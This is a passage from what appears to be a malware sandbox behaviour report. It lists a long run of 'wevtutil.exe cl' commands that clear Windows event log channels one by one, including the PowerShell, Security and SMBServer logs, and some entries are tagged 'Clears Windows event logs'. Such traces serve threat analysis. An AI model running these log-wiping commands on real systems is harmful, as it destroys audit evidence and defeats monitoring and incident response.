        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Diagnose"
        7⤵
        
        PID:4808
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Operational"
        7⤵
        
        PID:3456
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PhotoAcq/Analytic"
        7⤵
        
        PID:1404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PlayToManager/Analytic"
        7⤵
        
        PID:2524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Policy/Analytic"
        7⤵
        
        PID:4316
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Policy/Operational"
        7⤵
        
        PID:2600
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
        7⤵
        
        PID:1536
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
        7⤵
        
        PID:4484
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Power-Meter-Polling/Diagnostic"
        7⤵
        
        PID:3300
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
        7⤵
        Power Settings
        
        PID:1696
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
        7⤵
        
        PID:4308
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
        7⤵
        
        PID:4072
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:3980
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"
        7⤵
        
        PID:2176
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational"
        7⤵
        
        PID:4144
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell/Admin"
        7⤵
        
        PID:1744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
        7⤵
        
        PID:1032
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell/Debug"
        7⤵
        
        PID:4384
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
        7⤵
        
        PID:4056
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
        7⤵
        
        PID:1092
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintBRM/Admin"
        7⤵
        
        PID:1828
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintService-USBMon/Debug"
        7⤵
        
        PID:4920
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
        7⤵
        
        PID:668
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
        7⤵
        
        PID:2544
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
        7⤵
        
        PID:2424
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Privacy-Auditing/Operational"
        7⤵
        
        PID:3528
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ProcessStateManager/Diagnostic"
        7⤵
        
        PID:1416
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Analytic"
        7⤵
        
        PID:908
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/CompatAfterUpgrade"
        7⤵
        
        PID:4004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/Admin"
        7⤵
        
        PID:4536
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/AutoPilot"
        7⤵
        
        PID:5012
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/Debug"
        7⤵
        
        PID:4292
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/ManagementService"
        7⤵
        
        PID:4508
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Diagnostic"
        7⤵
        
        PID:1364
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Informational"
        7⤵
        
        PID:3424
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Performance"
        7⤵
        
        PID:3388
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PushNotification-Developer/Debug"
        7⤵
        
        PID:2420
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PushNotification-InProc/Debug"
        7⤵
        
        PID:5008
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Admin"
        7⤵
        
        PID:5092
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Debug"
        7⤵
        
        PID:2984
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Operational"
        7⤵
        
        PID:3140
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
        7⤵
        
        PID:3248
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
        7⤵
        
        PID:268
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
        7⤵
        
        PID:284
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
        7⤵
        
        PID:296
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
        7⤵
        
        PID:1720
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RRAS/Debug"
        7⤵
        Clears Windows event logs
        
        PID:300
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RRAS/Operational"
        7⤵
        
        PID:988
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RadioManager/Analytic"
        7⤵
        
        PID:1976
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Ras-NdisWanPacketCapture/Diagnostic"
        7⤵
        
        PID:4468
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RasAgileVpn/Debug"
        7⤵
        
        PID:4756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RasAgileVpn/Operational"
        7⤵
        
        PID:3184
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReFS/Operational"
        7⤵
        
        PID:2972
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
        7⤵
        
        PID:2628
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
        7⤵
        
        PID:2240
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
        7⤵
        
        PID:3348
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
        7⤵
        
        PID:2920
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Regsvr32/Operational"
        7⤵
        
        PID:2536
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
        7⤵
        
        PID:2592
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Operational"
        7⤵
        
        PID:4940
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
        7⤵
        
        PID:2548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
        7⤵
        
        PID:1164
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
        7⤵
        
        PID:2328
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
        7⤵
        
        PID:3304
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Debug"
        7⤵
        
        PID:3900
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
        7⤵
        
        PID:3612
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-Synth3dvsc/Admin"
        7⤵
        
        PID:1360
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-Kernel-Mode-Transport/Debug"
        7⤵
        
        PID:5004
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-User-Mode-Transport/Debug"
        7⤵
        
        PID:4132
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational"
        7⤵
        
        PID:3496
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Remotefs-Rdbss/Diagnostic"
        7⤵
        
        PID:4652
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Remotefs-Rdbss/Operational"
        7⤵
        
        PID:4220
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ResetEng-Trace/Diagnostic"
        7⤵
        
        PID:4968
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
        7⤵
        
        PID:4456
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
        7⤵
        
        PID:4400
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
        7⤵
        
        PID:2068
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
        7⤵
        
        PID:3892
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RetailDemo/Admin"
        7⤵
        
        PID:2688
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RetailDemo/Operational"
        7⤵
        
        PID:4352
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Graphics/Analytic"
        7⤵
        
        PID:4048
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Networking-BackgroundTransfer/Tracing"
        7⤵
        
        PID:5068
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Networking/Tracing"
        7⤵
        
        PID:696
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Web-Http/Tracing"
        7⤵
        
        PID:3744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-WebAPI/Tracing"
        7⤵
        
        PID:3176
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTAdaptiveMediaSource"
        7⤵
        
        PID:212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTCaptureEngine"
        7⤵
        
        PID:2488
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTMediaStreamSource"
        7⤵
        
        PID:460
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTTranscode"
        7⤵
        
        PID:1824
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime/CreateInstance"
        7⤵
        
        PID:2472
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Runtime/Error"
        7⤵
        Clears Windows event logs
        
        PID:1676
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBClient/Analytic"
        7⤵
        
        PID:4260
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBClient/HelperClassDiagnostic"
        7⤵
        
        PID:4840
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBClient/ObjectStateDiagnostic"
        7⤵
        
        PID:2784
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBClient/Operational"
        7⤵
        
        PID:3940
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBDirect/Admin"
        7⤵
        
        PID:3560
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBDirect/Debug"
        7⤵
        
        PID:1756
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBDirect/Netmon"
        7⤵
        
        PID:2744
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBServer/Analytic"
        7⤵
        
        PID:4296
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBServer/Audit"
        7⤵
        
        PID:3260
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBServer/Connectivity"
        7⤵
        
        PID:4524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBServer/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:2904
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBServer/Operational"
        7⤵
        
        PID:4720
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBServer/Performance"
        7⤵
        
        PID:3616
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBServer/Security"
        7⤵
        
        PID:4716
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBWitnessClient/Admin"
        7⤵
        
        PID:4408
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SMBWitnessClient/Informational"
        7⤵
        
        PID:4292
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SPB-ClassExtension/Analytic"
        7⤵
        
        PID:4508
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SPB-HIDI2C/Analytic"
        7⤵
        
        PID:1364
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Schannel-Events/Perf"
        7⤵
        
        PID:3424
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sdbus/Analytic"
        7⤵
        
        PID:3388
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sdbus/Debug"
        7⤵
        Clears Windows event logs
        
        PID:2420
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sdstor/Analytic"
        7⤵
        
        PID:5008
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
        7⤵
        
        PID:5092
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:2984
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SearchUI/Diagnostic"
        7⤵
        
        PID:3140
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SearchUI/Operational"
        7⤵
        
        PID:3248
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SecureAssessment/Operational"
        7⤵
        
        PID:272
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Adminless/Operational"
        7⤵
        
        PID:3772
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
        7⤵
        
        PID:1216
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
        7⤵
        
        PID:1524
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-EnterpriseData-FileRevocationManager/Operational"
        7⤵
        
        PID:2800
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Operational"
        7⤵
        
        PID:4904
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Performance"
        7⤵
        
        PID:312
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
        7⤵
        
        PID:3236
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-IdentityStore/Performance"
        7⤵
        
        PID:1748
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational"
        7⤵
        
        PID:2684
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Mitigations/KernelMode"
        7⤵
        
        PID:2908
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Mitigations/UserMode"
        7⤵
        
        PID:4912
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Netlogon/Operational"
        7⤵
        
        PID:224
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-GC/Analytic"
        7⤵
        
        PID:3380
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-GenuineCenter-Logging/Operational"
        7⤵
        Clears Windows event logs
        
        PID:1652
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX-Notifications/ActionCenter"
        7⤵
        
        PID:4424
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-SPP-UX/Analytic"
        7⤵
        
        PID:3620
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
        7⤵
        
        PID:3212
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-UserConsentVerifier/Audit"
        7⤵
        
        PID:4124
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Vault/Performance"
        7⤵
        
        PID:4016
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Admin"
        7⤵
        
        PID:4432
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Operational"
        7⤵
        
        PID:388
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Perf"
        7⤵
        
        PID:4276
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SendTo/Diagnostic"
        7⤵
        
        PID:2712
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
        7⤵
        
        PID:5036
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sensors/Debug"
        7⤵
        
        PID:368
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sensors/Performance"
        7⤵
        
        PID:2640
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Serial-ClassExtension-V2/Analytic"
        7⤵
        
        PID:4928
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Serial-ClassExtension/Analytic"
        7⤵
        
        PID:408
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
        7⤵
        
        PID:1516
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
        7⤵
        
        PID:3996
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
        7⤵
        
        PID:2956
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Servicing/Debug"
        7⤵
        
        PID:3456
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync-Azure/Debug"
        7⤵
        
        PID:1404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync-Azure/Operational"
        7⤵
        
        PID:3368
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Analytic"
        7⤵
        
        PID:4316
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Debug"
        7⤵
        
        PID:2600
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Operational"
        7⤵
        
        PID:2724
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync/Analytic"
        7⤵
        
        PID:3376
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync/Debug"
        7⤵
        
        PID:3624
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync/Operational"
        7⤵
        
        PID:1496
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SettingSync/VerboseDebug"
        7⤵
        
        PID:4308
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
        7⤵
        
        PID:1944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
        7⤵
        
        PID:3980
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SetupPlatform/Analytic"
        7⤵
        
        PID:2176
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
        7⤵
        
        PID:4144
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
        7⤵
        
        PID:2404
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
        7⤵
        
        PID:1084
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AppWizCpl/Diagnostic"
        7⤵
        Clears Windows event logs
        
        PID:4384
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
        7⤵
        
        PID:4056
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
        7⤵
        
        PID:1092
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
        7⤵
        
        PID:1340
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredentialProviderUser/Diagnostic"
        7⤵
        
        PID:4920
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
        7⤵
        
        PID:668
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-LogonUI/Diagnostic"
        7⤵
        
        PID:2544
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
        7⤵
        
        PID:4944
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter"
        7⤵
        
        PID:3528
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Core/ActionCenter"
        7⤵
        
        PID:1500
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Core/AppDefaults"
        7⤵
        
        PID:4160
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
        7⤵
        
        PID:2408
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Core/LogonTasksChannel"
        7⤵
        
        PID:3964
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Core/Operational"
        7⤵
        
        PID:4344
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
        7⤵
        
        PID:4588
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-LockScreenContent/Diagnostic"
        7⤵
        
        PID:4444
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-OpenWith/Diagnostic"
        7⤵
        
        PID:4860
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
        7⤵
        
        PID:2952
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
        7⤵
        
        PID:2044
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Diagnostic"
        7⤵
        
        PID:1564
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Operational"
        7⤵
        
        PID:2672
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
        7⤵
        
        PID:3064
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SleepStudy/Diagnostic"
        7⤵
        
        PID:3460
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmartCard-Audit/Authentication"
        7⤵
        
        PID:1548
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmartCard-DeviceEnum/Operational"
        7⤵
        
        PID:4828
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmartCard-TPM-VCard-Module/Admin"
        7⤵
        
        PID:2368
        
        C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SmartCard-TPM-VCard-Module/Operational"
        7⤵
        
        PID:268
        
        C:\Windows\system32\wevtutil.exe
        
